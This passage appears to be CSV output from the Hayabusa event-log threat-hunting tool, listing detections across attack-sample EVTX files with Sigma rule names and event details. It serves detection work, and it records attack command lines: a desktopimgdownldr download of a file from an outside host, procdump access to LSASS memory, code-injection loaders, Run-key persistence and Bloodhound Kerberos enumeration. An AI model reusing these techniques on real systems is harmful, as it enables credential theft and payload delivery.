File,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_remove_item_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Accessing WinAPI in PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-06-30 23:24:08.254 +09:00,MSEDGEWIN10,4104,high,Exec,Malicious PowerShell Keywords,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_malicious_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/Powershell_4104_MiniDumpWriteDump_Lsass.evtx 2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,high,,Process Access_Sysmon Alert,Evasion Suspicious NtOpenProcess Call | Src Process: C:\Users\Public\za3bollo.exe | Tgt Process: C:\Windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1972 | Src PGUID: 747F3D96-A591-5EFB-0000-00109FE4CC01 | Tgt PID: 2996 | Tgt PGUID: 747F3D96-59BB-5EFB-0000-0010D81B6400,../hayabusa-rules/hayabusa/sysmon/alerts/10_ProcessAccess_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx 2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,critical,Exec,Direct Syscall of NtOpenProcess,,../hayabusa-rules/sigma/process_access/sysmon_direct_syscall_ntopenprocess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx 2020-07-01 05:50:25.546 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_10_Evasion_Suspicious_NtOpenProcess_CallTrace.evtx 2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: spooler.exe payload.bin | Process: C:\Users\Public\tools\cinj\spooler.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89c8f | PID: 6892 | PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00 | Hash: SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.819 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.822 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\conhost.exe | Tgt Process: c:\Users\Public\tools\cinj\spooler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 640 | Src PGUID: 747F3D96-1E44-5EFE-0000-001060463700 | Tgt PID: 6892 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-0010B1F13D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\System32\spoolsv.exe | LID: 0x3e7 | PID: 3344 | PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\System32\spoolsv.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2704 | Src PGUID: 747F3D96-1CDA-5EFE-0000-0010E0780100 | Tgt PID: 3344 | Tgt PGUID: 747F3D96-1EA9-5EFE-0000-00102BF53D00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 02:51:37.872 +09:00,MSEDGEWIN10,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_spoolsv_sysmon_10_1.evtx 2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,,Process Created_Sysmon Alert,"suspicious execution path | Cmd: chost.exe payload.bin | Process: C:\Users\Public\tools\evasion\chost.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" | LID: 0x37e846b4 | PID: 16900 | PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A | Hash: SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.615 +09:00,LAPTOP-JU4M3I0E,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.617 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\Users\Public\tools\evasion\chost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16900 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00106D029D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: notepad | Process: C:\Windows\System32\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: \??\C:\windows\system32\conhost.exe 0xffffffff -ForceV1 | LID: 0x37e846b4 | PID: 16788 | PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,1,medium,Evas,Conhost Parent Process Executions,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_conhost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\conhost.exe | Tgt Process: C:\windows\system32\notepad.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 29168 | Src PGUID: 00247C92-1117-5EFE-0000-00105A024E3A | Tgt PID: 16788 | Tgt PGUID: 00247C92-20BD-5EFE-0000-00105C059D3A,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 03:00:29.650 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/evasion_codeinj_odzhan_conhost_sysmon_10_1.evtx 2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x89ccc | PID: 1932 | PGUID: 747F3D96-F098-5EFE-0000-001012E13801",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.037 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | Process: C:\Windows\System32\desktopimgdownldr.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c desktopimgdownldr.exe /lockscreenurl:https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z /eventName:desktopimgdownldr | LID: 0x89ccc | PID: 4604 | PGUID: 747F3D96-F098-5EFE-0000-001090E33801,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:20.073 +09:00,MSEDGEWIN10,1,high,C2,Suspicious Desktopimgdownldr Command,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_desktopimgdownldr.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\Personalization\LockScreenImage\LockScreenImage_uXQ8IiHL80mkJsKc319JaA.7z | Process: C:\Windows\System32\svchost.exe | PID: 1556 | PGUID: 747F3D96-2178-5EFE-0000-0010AADA5800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:47:21.491 +09:00,MSEDGEWIN10,11,high,Evas,Suspicious Desktopimgdownldr Target File,,../hayabusa-rules/sigma/file_event/win_susp_desktopimgdownldr_file.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/sysmon_11_1_lolbas_downldr_desktopimgdownldr.evtx 2020-07-03 17:55:49.123 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Download LockScreen Image | URL: https://a.uguu.se/Hv0bgvgHGNeH_Bin.7z,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/windows_bits_4_59_60_lolbas desktopimgdownldr.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: explorer.exe /root,""c:\windows\System32\calc.exe"" | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0xf3072 | PID: 6860 | PGUID: 6661D424-F4F6-5EFE-0000-0010E7EFF800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,low,Evas,Proxy Execution Via Explorer.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.278 +09:00,win10.ecorp.com,1,medium,Evas,Explorer Root Flag Process Tree Break,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_explorer_break_proctree.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | Process: C:\Windows\explorer.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p | LID: 0xf3072 | PID: 3612 | PGUID: 6661D424-F4F6-5EFE-0000-0010A2F6F800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: ECORP\Administrator | Parent Cmd: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding | LID: 0xf3072 | PID: 3224 | PGUID: 6661D424-F4F6-5EFE-0000-0010C00AF900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,info,,Process Created,"Cmd: ""C:\Windows\System32\win32calc.exe"" | Process: C:\Windows\System32\win32calc.exe | User: ECORP\Administrator | Parent Cmd: ""C:\Windows\System32\calc.exe"" | LID: 0xf3072 | PID: 2632 | PGUID: 6661D424-F4F6-5EFE-0000-00101D25F900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx 2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,"Persistence - Hidden Run value detected | SetValue: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\: ""c:\windows\tasks\taskhost.exe"" | Process: C:\Users\Public\tools\evasion\a.exe | PID: 3728 | PGUID: 747F3D96-8FD2-5F00-0000-0010C15D2200",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx 2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Persis,CurrentVersion Autorun Keys Modification,,../hayabusa-rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx 2020-07-04 23:31:26.838 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Count: DWORD (0x00000001) | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-04 23:31:26.849 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Section1: DefaultInstall | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-04 23:31:26.856 +09:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,Persistence - Pending GPO | SetValue: HKU\S-1-5-21-3461203602-4096304019-2269080069-1000\Software\Microsoft\IEAK\GroupPolicy\PendingGPOs\Path1: c:\programdata\gpo.inf | Process: C:\Windows\regedit.exe | PID: 1452 | PGUID: 747F3D96-92BB-5F00-0000-0010C1A73100,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_pendingGPO_sysmon_13.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 30256 | Src PGUID: 00247C92-EE6B-5F04-0000-00108C67A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 908 | Tgt PGUID: 00247C92-DC62-5EEF-0000-001026F60100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\Public\tools\SysinternalsSuite\procdump64.exe | Tgt Process: C:\windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 28528 | Src PGUID: 00247C92-EE6B-5F04-0000-00109069A859 | Tgt PID: 30096 | Tgt PGUID: 00247C92-EE6B-5F04-0000-00105C6CA859,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Memory Access by Tool Named Dump,,../hayabusa-rules/sigma/process_access/sysmon_lsass_memdump_indicators.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,CredAccess,LSASS Access from Program in Suspicious Folder,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx 2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATACORE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PKI01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: EXCHANGE01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEC01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS02$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WSUS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: DHCP01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ATANIDS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: PRTG-MON$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: MSSQL01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ADFS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: WEBIIS01$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx 2020-07-10 05:41:04.887 